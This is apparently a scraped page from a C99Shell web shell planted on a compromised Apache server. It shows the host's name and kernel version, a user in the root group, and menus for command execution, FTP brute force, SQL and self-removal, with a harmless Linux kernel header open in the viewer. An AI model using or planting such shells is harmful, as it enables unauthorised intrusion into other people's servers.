!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/src/linux-headers-5.15.0-153/include/linux/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     root_dev.h (619 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _ROOT_DEV_H_
#define _ROOT_DEV_H_

#include <linux/major.h>
#include <linux/types.h>
#include <linux/kdev_t.h>

enum {
    Root_NFS = MKDEV(UNNAMED_MAJOR, 255),
    Root_CIFS = MKDEV(UNNAMED_MAJOR, 254),
    Root_RAM0 = MKDEV(RAMDISK_MAJOR, 0),
    Root_RAM1 = MKDEV(RAMDISK_MAJOR, 1),
    Root_FD0 = MKDEV(FLOPPY_MAJOR, 0),
    Root_HDA1 = MKDEV(IDE0_MAJOR, 1),
    Root_HDA2 = MKDEV(IDE0_MAJOR, 2),
    Root_SDA1 = MKDEV(SCSI_DISK0_MAJOR, 1),
    Root_SDA2 = MKDEV(SCSI_DISK0_MAJOR, 2),
    Root_HDC1 = MKDEV(IDE1_MAJOR, 1),
    Root_SR0 = MKDEV(SCSI_CDROM_MAJOR, 0),
};

extern dev_t ROOT_DEV;

#endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0028 ]--